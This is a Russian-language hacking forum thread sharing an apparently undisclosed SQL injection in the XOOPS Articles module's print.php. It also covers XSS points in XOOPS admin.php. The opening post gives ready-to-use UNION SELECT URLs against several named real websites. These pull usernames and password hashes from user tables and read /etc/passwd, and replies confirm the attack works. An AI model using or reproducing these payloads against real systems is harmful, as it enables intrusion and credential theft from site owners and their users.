![]() |
[xoops]
Сейчас вот нарыл в Xoops'e одну вещь... Нигде в багтраках не видел этой уязвимости...
Программа: Xoops(пока что х3 до какой версии + должен присутствовать модуль - Articles) Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в сценарии print.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример: http://victim/modules/articles/print.php?id=-1{code} URL производителя: www.xoops.org Вот реальные примеры: Код:
http://www.irc.by/modules/articles/print.php?id=-99+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(uname,0x71),0x71),AES_DECRYPT(AES_ENCRYPT(pass,0x71),0x71),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users/*Код:
http://www.xoops2.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,convert(user()+using+cp1251),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops2_users/*Код:
http://www.xoops.pl/modules/articles/print.php?id=-99+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+manga_users/*Код:
http://www.dolbin.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,concat(uname,0x3a,pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users/*Код:
http://www.titanic.com/modules/articles/print.php?id=-99+union+select+1,2,3,4,LOAD_FILE('/etc/passwd'),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/* |
зачёт +
молодец |
Кстати... Если где-то вдруг это было - отпишитесь плз...
|
неплохо, зачёт адназначна :)
|
Респект, работает! Ставлю +.
|
Программа: XOOPS 2.0.16, возможно более ранние версии.
Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в параметре "tplset" и "module"(при определенных условиях, приведенных в примерах) в сценарии /modules/system/admin.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Для успешной эксплуатации уязвимости целевой пользователь должен быть залогинен как администратор. Examples: Код:
victim.xxx/modules/system/admin.php?fct=tplsets&op=listtpl&tplset=[XSS-here]&moddir=systemКод:
victim.xxx/modules/system/admin.php?fct=modulesadmin&op=install&module=[XSS-here](с)ice1k :: AltST |
Вот держите сканер этой баги
Цитата:
|
респект ;)
|
Цитата:
|
| Время: 07:15 |